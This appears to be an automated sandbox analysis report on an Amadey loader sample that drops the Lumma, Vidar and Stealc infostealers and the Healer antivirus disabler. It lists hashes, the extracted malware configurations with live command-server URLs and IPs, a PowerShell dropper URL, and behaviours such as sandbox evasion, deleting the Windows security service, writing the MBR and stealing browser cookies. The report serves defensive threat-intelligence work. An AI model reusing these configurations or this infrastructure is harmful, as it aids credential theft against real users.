amadey | d4cf07f30e19535dd48e4a54dd0e8a5030dff5db91c5e1317dd3d4251c6e3c6d

Analysis

max time kernel
70s
max time network
304s
platform
windows10-2004_x64
resource
win10v2004-20250313-en
resource tags

arch:x64arch:x86image:win10v2004-20250313-enlocale:en-usos:windows10-2004-x64system
submitted
29/03/2025, 12:53

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

random.exe
Size

5.4MB
MD5

0bf31c73f0e95a18595dd60e3ce41359
SHA1

00ab9a13e756265f4e45ae70f6af587a8c8184b5
SHA256

d4cf07f30e19535dd48e4a54dd0e8a5030dff5db91c5e1317dd3d4251c6e3c6d
SHA512

761c571d62e846428f560c99c18ff672ff8ea3354f3d929e9868f06e48ecae569049910dd40893ded90bf38a51d3883ef12a4572f58f6ea2a60262a7e85e527c
SSDEEP

98304:SY8MKMFkmzuwOXs4cYIeDhmzwiI7qyudXcrHwVPDo:pVKMFAwO8rpiQz9eXuRD

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

http://176.113.115.7/mine/random.exe

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

http://176.113.115.7/mine/random.exe

Extracted

Family

amadey

Version

5.21

Botnet

092155

http://176.113.115.6

Attributes

install_dir
bb556cff4a
install_file
rapes.exe
strings_key
a131b127e996a898cd19ffb2d92e481b
url_paths
/Ni9kiput/index.php

rc4.plain

Extracted

Family

lumma

https://wxayfarer.live/ALosnz

https://oreheatq.live/gsopp

https://castmaxw.run/ganzde

https://weldorae.digital/geds

https://steelixr.live/aguiz

https://advennture.top/GKsiio

https://targett.top/dsANGt

https://smeltingt.run/giiaus

https://fferromny.digital/gwpd

https://esccapewz.run/ANSbwqy

https://travewlio.shop/ZNxbHi

https://touvrlane.bet/ASKwjq

https://sighbtseeing.shop/ASJnzh

https://holidamyup.today/AOzkns

https://mtriplooqp.world/APowko

https://xcastmaxw.run/ganzde

https://7targett.top/dsANGt

https://ferromny.digital/gwpd

https://skynetxc.live/AksoPA

https://byteplusx.digital/aXweAX

Extracted

Family

vidar

Version

13.3

Botnet

11373d37b176b52c098f600f61cdf190

https://t.me/lw25chm

https://steamcommunity.com/profiles/76561199839170361

Attributes

user_agent
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 Chrome/132.0.0.0 Safari/537.36 OPR/117.0.0.0

Extracted

Family

vidar

Version

13.3

Botnet

928af183c2a2807a3c0526e8c0c9369d

https://t.me/lw25chm

https://steamcommunity.com/profiles/76561199839170361

Attributes

user_agent
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 Chrome/132.0.0.0 Safari/537.36 OPR/117.0.0.0

Extracted

Family

stealc

Botnet

trump

http://45.93.20.28

Attributes

url_path
/85a1cacf11314eb8.php

Signatures

Amadey
Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.
trojan amadey
Amadey family
amadey

Detect Vidar Stealer 26 IoCs

stealer

resource	yara_rule
behavioral2/memory/4128-151-0x0000000000400000-0x0000000000429000-memory.dmp	family_vidar_v7
behavioral2/memory/4128-154-0x0000000000400000-0x0000000000429000-memory.dmp	family_vidar_v7
behavioral2/memory/4128-152-0x0000000000400000-0x0000000000429000-memory.dmp	family_vidar_v7
behavioral2/memory/4128-175-0x0000000000400000-0x0000000000429000-memory.dmp	family_vidar_v7
behavioral2/memory/4128-187-0x0000000000400000-0x0000000000429000-memory.dmp	family_vidar_v7
behavioral2/memory/4128-192-0x0000000000400000-0x0000000000429000-memory.dmp	family_vidar_v7
behavioral2/memory/4128-193-0x0000000000400000-0x0000000000429000-memory.dmp	family_vidar_v7
behavioral2/memory/4128-196-0x0000000000400000-0x0000000000429000-memory.dmp	family_vidar_v7
behavioral2/memory/4128-200-0x0000000000400000-0x0000000000429000-memory.dmp	family_vidar_v7
behavioral2/memory/4128-201-0x0000000000400000-0x0000000000429000-memory.dmp	family_vidar_v7
behavioral2/memory/4128-205-0x0000000000400000-0x0000000000429000-memory.dmp	family_vidar_v7
behavioral2/memory/4128-238-0x0000000000400000-0x0000000000429000-memory.dmp	family_vidar_v7
behavioral2/memory/4128-608-0x0000000000400000-0x0000000000429000-memory.dmp	family_vidar_v7
behavioral2/memory/4128-609-0x0000000000400000-0x0000000000429000-memory.dmp	family_vidar_v7
behavioral2/memory/4128-610-0x0000000000400000-0x0000000000429000-memory.dmp	family_vidar_v7
behavioral2/memory/4128-611-0x0000000000400000-0x0000000000429000-memory.dmp	family_vidar_v7
behavioral2/memory/4128-614-0x0000000000400000-0x0000000000429000-memory.dmp	family_vidar_v7
behavioral2/memory/4128-619-0x0000000000400000-0x0000000000429000-memory.dmp	family_vidar_v7
behavioral2/memory/4128-620-0x0000000000400000-0x0000000000429000-memory.dmp	family_vidar_v7
behavioral2/memory/3576-654-0x0000000000400000-0x0000000000429000-memory.dmp	family_vidar_v7
behavioral2/memory/3576-655-0x0000000000400000-0x0000000000429000-memory.dmp	family_vidar_v7
behavioral2/memory/3576-657-0x0000000000400000-0x0000000000429000-memory.dmp	family_vidar_v7
behavioral2/memory/4128-658-0x0000000000400000-0x0000000000429000-memory.dmp	family_vidar_v7
behavioral2/memory/4128-662-0x0000000000400000-0x0000000000429000-memory.dmp	family_vidar_v7
behavioral2/memory/4128-676-0x0000000000400000-0x0000000000429000-memory.dmp	family_vidar_v7
behavioral2/memory/5468-811-0x0000000000400000-0x0000000000429000-memory.dmp	family_vidar_v7

Detects Healer an antivirus disabler dropper 3 IoCs

resource	yara_rule
behavioral2/memory/5944-37069-0x0000000000570000-0x00000000009B0000-memory.dmp	healer
behavioral2/memory/5944-37081-0x0000000000570000-0x00000000009B0000-memory.dmp	healer
behavioral2/memory/5944-37348-0x0000000000570000-0x00000000009B0000-memory.dmp	healer

Healer
Healer an antivirus disabler dropper.
dropper healer
Healer family
healer
Lumma Stealer, LummaC
Lumma or LummaC is an infostealer written in C++ first seen in August 2022.
stealer lumma
Lumma family
lumma

Modifies security service 2 TTPs 2 IoCs

defense_evasion

Modify Registry

T1112

Windows Service

T1543.003

description	ioc	Process
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wscsvc\Parameters	reg.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wscsvc\Security	reg.exe

Stealc
Stealc is an infostealer written in C++.
stealer stealc
Stealc family
stealc

Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs

description	pid	Process	procid_target
PID 3228 created 2532	3228	MSBuild.exe	42

Vidar
Vidar is an infostealer based on Arkei stealer.
stealer vidar
Vidar family
vidar

Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 7 IoCs

defense_evasion

Query Registry

T1012

Virtualization/Sandbox Evasion

T1497

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	1R32M4.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	rapes.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	2Y8961.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	d14d379e03.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	rapes.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	c4b6836368.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	a0d870d378.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 15 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
11516	powershell.exe
6420	powershell.exe
8968	powershell.exe
7740	powershell.exe
26320	powershell.exe
4000	powershell.exe
4584	powershell.exe
13128	powershell.exe
2712	powershell.exe
2468	PowerShell.exe
7980	powershell.exe
8880	powershell.exe
10324	powershell.exe
7276	powershell.exe
6944	powershell.exe

Creates new service(s) 2 TTPs
persistence execution

Windows Service
T1543.003

Service Execution
T1569.002

Downloads MZ/PE file 9 IoCs

flow	pid	Process
101	1356	rapes.exe
33	1356	rapes.exe
33	1356	rapes.exe
156	4712	futors.exe
156	4712	futors.exe
173	4712	futors.exe
53	1356	rapes.exe
53	1356	rapes.exe
160	1356	rapes.exe

Possible privilege escalation attempt 2 IoCs

exploit

pid	Process
4532	takeown.exe
2892	icacls.exe

Stops running service(s) 4 TTPs
defense_evasion execution

Windows Service
T1543.003

Impair Defenses
T1562

Service Stop
T1489

Service Execution
T1569.002

Uses browser remote debugging 2 TTPs 64 IoCs

Can be used control the browser and steal sensitive information such as credentials and session cookies.

credential_access stealer

Steal Web Session Cookie

T1539

Modify Authentication Process

T1556

pid	Process
3200	chrome.exe
11476	msedge.exe
7404	msedge.exe
9380	msedge.exe
3608	chrome.exe
2624	chrome.exe
9412	msedge.exe
1388	chrome.exe
26228	msedge.exe
20676	msedge.exe
20436	msedge.exe
20448	msedge.exe
4480	chrome.exe
9280	msedge.exe
12944	msedge.exe
15308	msedge.exe
5364	chrome.exe
12052	msedge.exe
10384	msedge.exe
25172	chrome.exe
16288	msedge.exe
11800	chrome.exe
4660	chrome.exe
3112	msedge.exe
11540	chrome.exe
21220	msedge.exe
4692	chrome.exe
12956	msedge.exe
1892	msedge.exe
4024	chrome.exe
4384	chrome.exe
5880	chrome.exe
6736	msedge.exe
7864	msedge.exe
24860	chrome.exe
4632	chrome.exe
1100	msedge.exe
10876	msedge.exe
24612	chrome.exe
1792	chrome.exe
12044	msedge.exe
3496	chrome.exe
16248	msedge.exe
17464	chrome.exe
24024	msedge.exe
10960	msedge.exe
17592	msedge.exe
15288	msedge.exe
21216	msedge.exe
2592	chrome.exe
5456	chrome.exe
24032	msedge.exe
19800	chrome.exe
24868	chrome.exe
20688	msedge.exe
17612	msedge.exe
6140	chrome.exe
13016	msedge.exe
17284	chrome.exe
1740	msedge.exe
4548	msedge.exe
1988	chrome.exe
2584	chrome.exe
26244	msedge.exe

Checks BIOS information in registry 2 TTPs 14 IoCs

BIOS information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	2Y8961.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	d14d379e03.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	c4b6836368.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	a0d870d378.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	a0d870d378.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	1R32M4.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	2Y8961.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	d14d379e03.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	rapes.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	rapes.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	c4b6836368.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	1R32M4.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	rapes.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	rapes.exe

Checks computer location settings 2 TTPs 7 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-3446877943-4095308722-756223633-1000\Control Panel\International\Geo\Nation	rapes.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3446877943-4095308722-756223633-1000\Control Panel\International\Geo\Nation	apple.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3446877943-4095308722-756223633-1000\Control Panel\International\Geo\Nation	22.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3446877943-4095308722-756223633-1000\Control Panel\International\Geo\Nation	22.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3446877943-4095308722-756223633-1000\Control Panel\International\Geo\Nation	amnew.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3446877943-4095308722-756223633-1000\Control Panel\International\Geo\Nation	futors.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3446877943-4095308722-756223633-1000\Control Panel\International\Geo\Nation	1R32M4.exe

Executes dropped EXE 21 IoCs

pid	Process
1888	g0F78.exe
2332	1R32M4.exe
1356	rapes.exe
3880	2Y8961.exe
3384	d14d379e03.exe
5400	EPTwCQd.exe
2796	rapes.exe
1100	Rm3cVPI.exe
5720	c4b6836368.exe
2816	apple.exe
812	22.exe
6088	22.exe
2968	hYjiwV0.exe
2160	amnew.exe
4712	futors.exe
5884	Rm3cVPI.exe
664	a0d870d378.exe
5884	gron12321.exe
3904	TbV75ZR.exe
3276	v7942.exe
3168	hYjiwV0.exe

Identifies Wine through registry keys 2 TTPs 7 IoCs

Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.

defense_evasion

Query Registry

T1012

Virtualization/Sandbox Evasion

T1497

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-3446877943-4095308722-756223633-1000\Software\Wine	d14d379e03.exe
Key opened	\REGISTRY\USER\S-1-5-21-3446877943-4095308722-756223633-1000\Software\Wine	rapes.exe
Key opened	\REGISTRY\USER\S-1-5-21-3446877943-4095308722-756223633-1000\Software\Wine	c4b6836368.exe
Key opened	\REGISTRY\USER\S-1-5-21-3446877943-4095308722-756223633-1000\Software\Wine	a0d870d378.exe
Key opened	\REGISTRY\USER\S-1-5-21-3446877943-4095308722-756223633-1000\Software\Wine	1R32M4.exe
Key opened	\REGISTRY\USER\S-1-5-21-3446877943-4095308722-756223633-1000\Software\Wine	rapes.exe
Key opened	\REGISTRY\USER\S-1-5-21-3446877943-4095308722-756223633-1000\Software\Wine	2Y8961.exe

Modifies file permissions 1 TTPs 2 IoCs

discovery

File and Directory Permissions Modification

T1222

pid	Process
4532	takeown.exe
2892	icacls.exe

Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Adds Run key to start application 2 TTPs 2 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\""	random.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup1 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP001.TMP\\\""	g0F78.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

Looks up external IP address via web service 2 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
1511	api.ipify.org
1516	api.ipify.org

Writes to the Master Boot Record (MBR) 1 TTPs 1 IoCs

Bootkits write to the MBR to gain persistence at a level below the operating system.

bootkit persistence

Bootkit

T1542.003

description	ioc	Process
File opened for modification	\??\PHYSICALDRIVE0	c4b6836368.exe

AutoIT Executable 1 IoCs

AutoIT scripts compiled to PE executables.

resource	yara_rule
behavioral2/files/0x0007000000024509-35986.dat	autoit_exe

Enumerates processes with tasklist 1 TTPs 2 IoCs

discovery

Process Discovery

T1057

pid	Process
4536	tasklist.exe
5812	tasklist.exe

Suspicious use of NtSetInformationThreadHideFromDebugger 7 IoCs

pid	Process
2332	1R32M4.exe
1356	rapes.exe
3880	2Y8961.exe
3384	d14d379e03.exe
2796	rapes.exe
5720	c4b6836368.exe
664	a0d870d378.exe

Suspicious use of SetThreadContext 6 IoCs

description	pid	Process	procid_target
PID 5400 set thread context of 780	5400	EPTwCQd.exe	109
PID 2968 set thread context of 4128	2968	hYjiwV0.exe	190
PID 5884 set thread context of 2460	5884	gron12321.exe	218
PID 3904 set thread context of 3228	3904	TbV75ZR.exe	220
PID 3276 set thread context of 3576	3276	v7942.exe	223
PID 3168 set thread context of 5468	3168	hYjiwV0.exe	240

Drops file in Windows directory 2 IoCs

description	ioc	Process
File created	C:\Windows\Tasks\rapes.job	1R32M4.exe
File created	C:\Windows\Tasks\futors.job	amnew.exe

Launches sc.exe 38 IoCs

Sc.exe is a Windows utlilty to control services on the system.

pid	Process
3452	sc.exe
4028	sc.exe
2220	sc.exe
3580	sc.exe
3128	sc.exe
3916	sc.exe
2540	sc.exe
4576	sc.exe
6140	sc.exe
4468	sc.exe
4360	sc.exe
2524	sc.exe
2828	sc.exe
5796	sc.exe
1176	sc.exe
3268	sc.exe
544	sc.exe
3176	sc.exe
5400	sc.exe
4544	sc.exe
4340	sc.exe
1904	sc.exe
6036	sc.exe
2412	sc.exe
4584	sc.exe
5216	sc.exe
4348	sc.exe
5652	sc.exe
4620	sc.exe
3288	sc.exe
1568	sc.exe
5496	sc.exe
5308	sc.exe
784	sc.exe
5740	sc.exe
1328	sc.exe
776	sc.exe
5404	sc.exe

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Program crash 13 IoCs

pid	pid_target	Process	procid_target
2156	664	WerFault.exe	204
4996	3228	WerFault.exe	220
16656	12568	WerFault.exe	671
19876	12024	WerFault.exe	670
25876	16804	WerFault.exe	677
17252	15824	WerFault.exe	730
17244	15776	WerFault.exe	731
17300	19568	WerFault.exe	712
12960	17372	WerFault.exe	763
10760	13996	WerFault.exe	768
14868	11916	WerFault.exe	783
19632	19740	WerFault.exe	792
5892	5856	WerFault.exe	791

System Location Discovery: System Language Discovery 1 TTPs 22 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	MSBuild.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	random.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	g0F78.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	2Y8961.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	MSBuild.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	22.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Rm3cVPI.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	MSBuild.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	rapes.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Rm3cVPI.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	c4b6836368.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	apple.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	amnew.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	futors.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	1R32M4.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	d14d379e03.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	22.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	MSBuild.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	a0d870d378.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	MSBuild.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	MSBuild.exe

Checks processor information in registry 2 TTPs 4 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	MSBuild.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	MSBuild.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier	chrome.exe

Delays execution with timeout.exe 5 IoCs

defense_evasion

pid	Process
17104	timeout.exe
14860	timeout.exe
3200	timeout.exe
4512	timeout.exe
10664	timeout.exe

Enumerates system info in registry 2 TTPs 6 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	chrome.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe

Kills process with taskkill 5 IoCs

defense_evasion

pid	Process
10344	taskkill.exe
5684	taskkill.exe
8340	taskkill.exe
8464	taskkill.exe
8100	taskkill.exe

Modifies data under HKEY_USERS 2 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133877264812997927"	chrome.exe

Modifies registry key 1 TTPs 5 IoCs

Modify Registry

T1112

pid	Process
7308	reg.exe
6356	reg.exe
8784	reg.exe
12832	reg.exe
11604	reg.exe

Scheduled Task/Job: Scheduled Task 1 TTPs 2 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

T1053.005

pid	Process
13232	schtasks.exe
11556	schtasks.exe

Suspicious behavior: EnumeratesProcesses 56 IoCs

pid	Process
2332	1R32M4.exe
2332	1R32M4.exe
1356	rapes.exe
1356	rapes.exe
3880	2Y8961.exe
3880	2Y8961.exe
3880	2Y8961.exe
3880	2Y8961.exe
3880	2Y8961.exe
3880	2Y8961.exe
3384	d14d379e03.exe
3384	d14d379e03.exe
3384	d14d379e03.exe
3384	d14d379e03.exe
3384	d14d379e03.exe
3384	d14d379e03.exe
2796	rapes.exe
2796	rapes.exe
780	MSBuild.exe
780	MSBuild.exe
780	MSBuild.exe
780	MSBuild.exe
1100	Rm3cVPI.exe
1100	Rm3cVPI.exe
1100	Rm3cVPI.exe
1100	Rm3cVPI.exe
5720	c4b6836368.exe
5720	c4b6836368.exe
4128	MSBuild.exe
4128	MSBuild.exe
4128	MSBuild.exe
4128	MSBuild.exe
3200	chrome.exe
3200	chrome.exe
5884	Rm3cVPI.exe
5884	Rm3cVPI.exe
5884	Rm3cVPI.exe
5884	Rm3cVPI.exe
664	a0d870d378.exe
664	a0d870d378.exe
2460	MSBuild.exe
2460	MSBuild.exe
2460	MSBuild.exe
2460	MSBuild.exe
4128	MSBuild.exe
4128	MSBuild.exe
3228	MSBuild.exe
3228	MSBuild.exe
3228	MSBuild.exe
3228	MSBuild.exe
3104	svchost.exe
3104	svchost.exe
3104	svchost.exe
3104	svchost.exe
4128	MSBuild.exe
4128	MSBuild.exe

Suspicious behavior: LoadsDriver 2 IoCs

pid	Process
656	Process not Found
656	Process not Found

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 6 IoCs

pid	Process
3200	chrome.exe
3200	chrome.exe
3200	chrome.exe
3200	chrome.exe
1100	msedge.exe
1100	msedge.exe

Suspicious use of AdjustPrivilegeToken 14 IoCs

description	pid	Process
Token: SeShutdownPrivilege	3200	chrome.exe
Token: SeCreatePagefilePrivilege	3200	chrome.exe
Token: SeShutdownPrivilege	3200	chrome.exe
Token: SeCreatePagefilePrivilege	3200	chrome.exe
Token: SeShutdownPrivilege	3200	chrome.exe
Token: SeCreatePagefilePrivilege	3200	chrome.exe
Token: SeShutdownPrivilege	3200	chrome.exe
Token: SeCreatePagefilePrivilege	3200	chrome.exe
Token: SeShutdownPrivilege	3200	chrome.exe
Token: SeCreatePagefilePrivilege	3200	chrome.exe
Token: SeShutdownPrivilege	3200	chrome.exe
Token: SeCreatePagefilePrivilege	3200	chrome.exe
Token: SeShutdownPrivilege	3200	chrome.exe
Token: SeCreatePagefilePrivilege	3200	chrome.exe

Suspicious use of FindShellTrayWindow 28 IoCs

pid	Process
2332	1R32M4.exe
3200	chrome.exe
3200	chrome.exe
3200	chrome.exe
3200	chrome.exe
3200	chrome.exe
3200	chrome.exe
3200	chrome.exe
3200	chrome.exe
3200	chrome.exe
3200	chrome.exe
3200	chrome.exe
3200	chrome.exe
3200	chrome.exe
3200	chrome.exe
3200	chrome.exe
3200	chrome.exe
3200	chrome.exe
3200	chrome.exe
3200	chrome.exe
3200	chrome.exe
3200	chrome.exe
3200	chrome.exe
3200	chrome.exe
3200	chrome.exe
3200	chrome.exe
3200	chrome.exe
1100	msedge.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 1080 wrote to memory of 1888	1080	random.exe	88
PID 1080 wrote to memory of 1888	1080	random.exe	88
PID 1080 wrote to memory of 1888	1080	random.exe	88
PID 684 wrote to memory of 1980	684	cmd.exe	89
PID 684 wrote to memory of 1980	684	cmd.exe	89
PID 1888 wrote to memory of 2332	1888	g0F78.exe	92
PID 1888 wrote to memory of 2332	1888	g0F78.exe	92
PID 1888 wrote to memory of 2332	1888	g0F78.exe	92
PID 2308 wrote to memory of 4500	2308	cmd.exe	93
PID 2308 wrote to memory of 4500	2308	cmd.exe	93
PID 2332 wrote to memory of 1356	2332	1R32M4.exe	97
PID 2332 wrote to memory of 1356	2332	1R32M4.exe	97
PID 2332 wrote to memory of 1356	2332	1R32M4.exe	97
PID 1888 wrote to memory of 3880	1888	g0F78.exe	98
PID 1888 wrote to memory of 3880	1888	g0F78.exe	98
PID 1888 wrote to memory of 3880	1888	g0F78.exe	98
PID 1356 wrote to memory of 3384	1356	rapes.exe	105
PID 1356 wrote to memory of 3384	1356	rapes.exe	105
PID 1356 wrote to memory of 3384	1356	rapes.exe	105
PID 1356 wrote to memory of 5400	1356	rapes.exe	108
PID 1356 wrote to memory of 5400	1356	rapes.exe	108
PID 5400 wrote to memory of 780	5400	EPTwCQd.exe	109
PID 5400 wrote to memory of 780	5400	EPTwCQd.exe	109
PID 5400 wrote to memory of 780	5400	EPTwCQd.exe	109
PID 5400 wrote to memory of 780	5400	EPTwCQd.exe	109
PID 5400 wrote to memory of 780	5400	EPTwCQd.exe	109
PID 5400 wrote to memory of 780	5400	EPTwCQd.exe	109
PID 5400 wrote to memory of 780	5400	EPTwCQd.exe	109
PID 5400 wrote to memory of 780	5400	EPTwCQd.exe	109
PID 5400 wrote to memory of 780	5400	EPTwCQd.exe	109
PID 1356 wrote to memory of 1100	1356	rapes.exe	111
PID 1356 wrote to memory of 1100	1356	rapes.exe	111
PID 1356 wrote to memory of 1100	1356	rapes.exe	111
PID 1356 wrote to memory of 5720	1356	rapes.exe	113
PID 1356 wrote to memory of 5720	1356	rapes.exe	113
PID 1356 wrote to memory of 5720	1356	rapes.exe	113
PID 1356 wrote to memory of 2816	1356	rapes.exe	117
PID 1356 wrote to memory of 2816	1356	rapes.exe	117
PID 1356 wrote to memory of 2816	1356	rapes.exe	117
PID 2816 wrote to memory of 812	2816	apple.exe	118
PID 2816 wrote to memory of 812	2816	apple.exe	118
PID 2816 wrote to memory of 812	2816	apple.exe	118
PID 812 wrote to memory of 2792	812	22.exe	120
PID 812 wrote to memory of 2792	812	22.exe	120
PID 2792 wrote to memory of 6088	2792	cmd.exe	122
PID 2792 wrote to memory of 6088	2792	cmd.exe	122
PID 2792 wrote to memory of 6088	2792	cmd.exe	122
PID 6088 wrote to memory of 5856	6088	22.exe	123
PID 6088 wrote to memory of 5856	6088	22.exe	123
PID 5856 wrote to memory of 1328	5856	cmd.exe	125
PID 5856 wrote to memory of 1328	5856	cmd.exe	125
PID 5856 wrote to memory of 5740	5856	cmd.exe	126
PID 5856 wrote to memory of 5740	5856	cmd.exe	126
PID 5856 wrote to memory of 3200	5856	cmd.exe	127
PID 5856 wrote to memory of 3200	5856	cmd.exe	127
PID 5856 wrote to memory of 4544	5856	cmd.exe	128
PID 5856 wrote to memory of 4544	5856	cmd.exe	128
